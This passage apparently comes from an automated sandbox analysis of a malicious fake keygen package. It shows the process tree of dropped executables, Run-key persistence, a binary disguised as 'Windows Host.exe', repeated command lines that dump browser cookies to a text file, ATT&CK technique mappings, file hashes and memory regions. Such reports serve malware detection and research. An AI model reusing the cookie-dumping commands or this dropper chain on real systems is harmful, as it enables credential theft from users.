                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX4\md4_4igk.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX4\md4_4igk.exe"
                                                                                                                                                                                        4⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        PID:820
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX4\BTRSetp.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX4\BTRSetp.exe"
                                                                                                                                                                                        4⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        PID:2132
                                                                                                                                                                                        • C:\ProgramData\686094.exe
                                                                                                                                                                                          "C:\ProgramData\686094.exe"
                                                                                                                                                                                          5⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                          PID:2900
                                                                                                                                                                                        • C:\ProgramData\4811089.exe
                                                                                                                                                                                          "C:\ProgramData\4811089.exe"
                                                                                                                                                                                          5⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          • Adds Run key to start application
                                                                                                                                                                                          PID:2376
                                                                                                                                                                                          • C:\ProgramData\Windows Host\Windows Host.exe
                                                                                                                                                                                            "C:\ProgramData\Windows Host\Windows Host.exe"
                                                                                                                                                                                            6⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            PID:1292
                                                                                                                                                                                        • C:\ProgramData\8226603.exe
                                                                                                                                                                                          "C:\ProgramData\8226603.exe"
                                                                                                                                                                                          5⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                                          PID:1300
                                                                                                                                                                                          • C:\ProgramData\8226603.exe
                                                                                                                                                                                            "{path}"
                                                                                                                                                                                            6⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                            PID:3220
                                                                                                                                                                                        • C:\ProgramData\2742116.exe
                                                                                                                                                                                          "C:\ProgramData\2742116.exe"
                                                                                                                                                                                          5⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                          PID:2688
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX4\gcttt.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX4\gcttt.exe"
                                                                                                                                                                                        4⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • Adds Run key to start application
                                                                                                                                                                                        PID:1140
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                          5⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          PID:3020
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                          5⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                          PID:3132
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                          5⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                          PID:3628
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                          5⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                          PID:3772

                                                                                                                                                                                Network

                                                                                                                                                                                MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                Persistence

                                                                                                                                                                                Registry Run Keys / Startup Folder

                                                                                                                                                                                1
                                                                                                                                                                                T1060

                                                                                                                                                                                Defense Evasion

                                                                                                                                                                                Modify Registry

                                                                                                                                                                                2
                                                                                                                                                                                T1112

                                                                                                                                                                                Install Root Certificate

                                                                                                                                                                                1
                                                                                                                                                                                T1130

                                                                                                                                                                                Credential Access

                                                                                                                                                                                Credentials in Files

                                                                                                                                                                                5
                                                                                                                                                                                T1081

                                                                                                                                                                                Discovery

                                                                                                                                                                                Query Registry

                                                                                                                                                                                3
                                                                                                                                                                                T1012

                                                                                                                                                                                System Information Discovery

                                                                                                                                                                                3
                                                                                                                                                                                T1082

                                                                                                                                                                                Remote System Discovery

                                                                                                                                                                                1
                                                                                                                                                                                T1018

                                                                                                                                                                                Collection

                                                                                                                                                                                Data from Local System

                                                                                                                                                                                5
                                                                                                                                                                                T1005

                                                                                                                                                                                Command and Control

                                                                                                                                                                                Web Service

                                                                                                                                                                                1
                                                                                                                                                                                T1102

                                                                                                                                                                                Replay Monitor

                                                                                                                                                                                Loading Replay Monitor...

                                                                                                                                                                                Downloads

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
                                                                                                                                                                                  MD5

                                                                                                                                                                                  dd7646131fb6562a31f4698e4e7de53d

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  3a5c4315837f7b44b7db8d17bcc74ea68d915dfa

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  c48c8df0740614b9287660b6974ea04f6bb401fb0e9e43ddacc446364635355a

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  0e0d37e9f106109e6a345050a0234b68655ff5c3da4e76b83e0e457baee42933d0c7ad2376172662ee6818f07ab9d90365e77b0adc3a52677384b3bf59b6cd77

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
                                                                                                                                                                                  MD5

                                                                                                                                                                                  65b49b106ec0f6cf61e7dc04c0a7eb74

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  a1f4784377c53151167965e0ff225f5085ebd43b

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  862a8cf0e5561c848145a1a1f464acf77f92a3b15cc43722a7208701f60a2fcd

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  e9030cd609f42fb616e5bac3a5203ae46bbae9ec95682432a367f8805cdaa3e30c18a732ceddb0545ac653d543348a6728866149d2822752c80948066bfdf3da

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
                                                                                                                                                                                  MD5

                                                                                                                                                                                  65b49b106ec0f6cf61e7dc04c0a7eb74

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  a1f4784377c53151167965e0ff225f5085ebd43b

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  862a8cf0e5561c848145a1a1f464acf77f92a3b15cc43722a7208701f60a2fcd

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  e9030cd609f42fb616e5bac3a5203ae46bbae9ec95682432a367f8805cdaa3e30c18a732ceddb0545ac653d543348a6728866149d2822752c80948066bfdf3da

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
                                                                                                                                                                                  MD5

                                                                                                                                                                                  c615d0bfa727f494fee9ecb3f0acf563

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  6c3509ae64abc299a7afa13552c4fe430071f087

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  95d91febc45d03c1ee477c127bcbd332cd6fbce1e91105004af723594e6f0199

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  d97256eb93d8e546f5fb5c61bebe61e7dfab316eb7685be83782bd36b28df3f80880e7b823197a4b6bae1af7b9460c4c81357dd44ed199ab93ccaee5acc10e51

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
                                                                                                                                                                                  MD5

                                                                                                                                                                                  c615d0bfa727f494fee9ecb3f0acf563

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  6c3509ae64abc299a7afa13552c4fe430071f087

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  95d91febc45d03c1ee477c127bcbd332cd6fbce1e91105004af723594e6f0199

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  d97256eb93d8e546f5fb5c61bebe61e7dfab316eb7685be83782bd36b28df3f80880e7b823197a4b6bae1af7b9460c4c81357dd44ed199ab93ccaee5acc10e51

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat
                                                                                                                                                                                  MD5

                                                                                                                                                                                  39f80c4d452a26def7a2d05f32a74e02

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  de6ef8e49e7725f627b1d748d7138c226bff75e1

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  f8d3c7043a3308cc1dedcf76bc0cd484df93822a7e3edddcab1595bb4959e582

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  97f6af2ca63a6784b9d63d996d68cec36b7eca8a39a85ea6ef3e3d540594944a7539266fec15fa4843ec1cd87d9523a723cedf00b6feaa5cc666b99ae67adf56

                                                                                                                                                                                • \??\pipe\crashpad_1100_XAURSCKBRLGNDRKC
                                                                                                                                                                                  MD5

                                                                                                                                                                                  d41d8cd98f00b204e9800998ecf8427e

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                                                                                                                                • \Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
                                                                                                                                                                                  MD5

                                                                                                                                                                                  65b49b106ec0f6cf61e7dc04c0a7eb74

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  a1f4784377c53151167965e0ff225f5085ebd43b

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  862a8cf0e5561c848145a1a1f464acf77f92a3b15cc43722a7208701f60a2fcd

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  e9030cd609f42fb616e5bac3a5203ae46bbae9ec95682432a367f8805cdaa3e30c18a732ceddb0545ac653d543348a6728866149d2822752c80948066bfdf3da

                                                                                                                                                                                • \Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
                                                                                                                                                                                  MD5

                                                                                                                                                                                  c615d0bfa727f494fee9ecb3f0acf563

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  6c3509ae64abc299a7afa13552c4fe430071f087

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  95d91febc45d03c1ee477c127bcbd332cd6fbce1e91105004af723594e6f0199

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  d97256eb93d8e546f5fb5c61bebe61e7dfab316eb7685be83782bd36b28df3f80880e7b823197a4b6bae1af7b9460c4c81357dd44ed199ab93ccaee5acc10e51

                                                                                                                                                                                • \Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
                                                                                                                                                                                  MD5

                                                                                                                                                                                  c615d0bfa727f494fee9ecb3f0acf563

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  6c3509ae64abc299a7afa13552c4fe430071f087

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  95d91febc45d03c1ee477c127bcbd332cd6fbce1e91105004af723594e6f0199

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  d97256eb93d8e546f5fb5c61bebe61e7dfab316eb7685be83782bd36b28df3f80880e7b823197a4b6bae1af7b9460c4c81357dd44ed199ab93ccaee5acc10e51

                                                                                                                                                                                • memory/316-72-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/328-213-0x00000000010E0000-0x0000000001127000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  284KB

                                                                                                                                                                                • memory/436-173-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/588-231-0x0000000002360000-0x00000000023A7000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  284KB

                                                                                                                                                                                • memory/712-83-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/852-159-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/852-197-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/864-224-0x0000000001810000-0x0000000001877000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  412KB

                                                                                                                                                                                • memory/864-203-0x0000000001290000-0x00000000012F7000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  412KB

                                                                                                                                                                                • memory/864-202-0x00000000007C0000-0x0000000000804000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  272KB

                                                                                                                                                                                • memory/960-76-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/1064-59-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/1072-79-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/1100-77-0x0000000006C60000-0x0000000006C61000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/1292-240-0x00000000046D0000-0x00000000046D1000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/1300-239-0x00000000046D0000-0x00000000046D1000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/1436-70-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/1568-67-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/1592-147-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/1600-116-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/1600-210-0x0000000000400000-0x00000000004B4000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  720KB

                                                                                                                                                                                • memory/1600-209-0x0000000000340000-0x00000000003D1000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  580KB

                                                                                                                                                                                • memory/1600-235-0x00000000045E0000-0x00000000045E1000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/1676-172-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/1688-215-0x0000000140000000-0x000000014070A000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  7.0MB

                                                                                                                                                                                • memory/1688-155-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/1688-219-0x00000000001E0000-0x0000000000200000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  128KB

                                                                                                                                                                                • memory/1704-216-0x0000000140000000-0x0000000140383000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  3.5MB

                                                                                                                                                                                • memory/1716-64-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/1720-166-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/1736-85-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/1744-62-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/1744-63-0x0000000077520000-0x0000000077521000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/1784-153-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/1784-178-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/2052-161-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/2108-125-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/2132-236-0x000000001ABC0000-0x000000001ABC2000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  8KB

                                                                                                                                                                                • memory/2144-228-0x0000000000400000-0x00000000004B4000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  720KB

                                                                                                                                                                                • memory/2148-211-0x0000000000220000-0x0000000000264000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  272KB

                                                                                                                                                                                • memory/2164-212-0x0000000000400000-0x0000000000447000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  284KB

                                                                                                                                                                                • memory/2168-113-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/2184-164-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/2200-165-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/2204-225-0x0000000000DB0000-0x0000000000F07000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  1.3MB

                                                                                                                                                                                • memory/2204-226-0x0000000010000000-0x000000001019E000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  1.6MB

                                                                                                                                                                                • memory/2212-222-0x0000000000380000-0x00000000003D6000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  344KB

                                                                                                                                                                                • memory/2264-119-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/2268-180-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/2272-183-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/2312-89-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/2376-238-0x0000000004750000-0x0000000004751000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/2408-175-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/2488-92-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/2496-191-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/2532-122-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/2608-95-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/2616-199-0x0000000000400000-0x0000000000983000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  5.5MB

                                                                                                                                                                                • memory/2636-220-0x0000000002740000-0x00000000028DC000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  1.6MB

                                                                                                                                                                                • memory/2640-207-0x0000000010000000-0x000000001019E000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  1.6MB

                                                                                                                                                                                • memory/2640-206-0x0000000002320000-0x0000000002477000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  1.3MB

                                                                                                                                                                                • memory/2644-218-0x0000000000080000-0x0000000000092000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  72KB

                                                                                                                                                                                • memory/2644-208-0x0000000002B70000-0x0000000002C5F000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  956KB

                                                                                                                                                                                • memory/2644-198-0x0000000002260000-0x00000000023FC000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  1.6MB

                                                                                                                                                                                • memory/2644-217-0x00000000000A0000-0x00000000000A1000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/2656-98-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/2664-167-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/2668-127-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/2684-129-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/2688-241-0x0000000004A80000-0x0000000004A81000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/2692-169-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/2700-168-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/2712-101-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/2728-132-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/2736-233-0x0000000140000000-0x0000000140383000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  3.5MB

                                                                                                                                                                                • memory/2748-135-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/2760-104-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/2772-170-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/2780-179-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/2784-137-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/2796-171-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/2804-174-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/2808-107-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/2828-141-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/2832-143-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/2856-111-0x000007FEFBBF1000-0x000007FEFBBF3000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  8KB

                                                                                                                                                                                • memory/2856-109-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/2872-110-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/2884-234-0x00000000001B0000-0x00000000001D0000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  128KB

                                                                                                                                                                                • memory/2884-196-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/2900-237-0x0000000000860000-0x0000000000861000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/2904-150-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/2924-176-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/2928-187-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/2944-182-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/2948-214-0x0000000002B50000-0x0000000002C55000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  1.0MB

                                                                                                                                                                                • memory/2948-205-0x0000000000430000-0x0000000000497000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  412KB

                                                                                                                                                                                • memory/2964-201-0x0000000000710000-0x0000000000766000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  344KB

                                                                                                                                                                                • memory/2964-200-0x0000000000670000-0x00000000006AA000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  232KB

                                                                                                                                                                                • memory/2988-195-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/3024-177-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/3036-194-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/3048-163-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/3056-181-0x0000000000000000-mapping.dmp
                                                                                                                                                                                • memory/3220-242-0x0000000000500000-0x0000000000501000-memory.dmp
                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB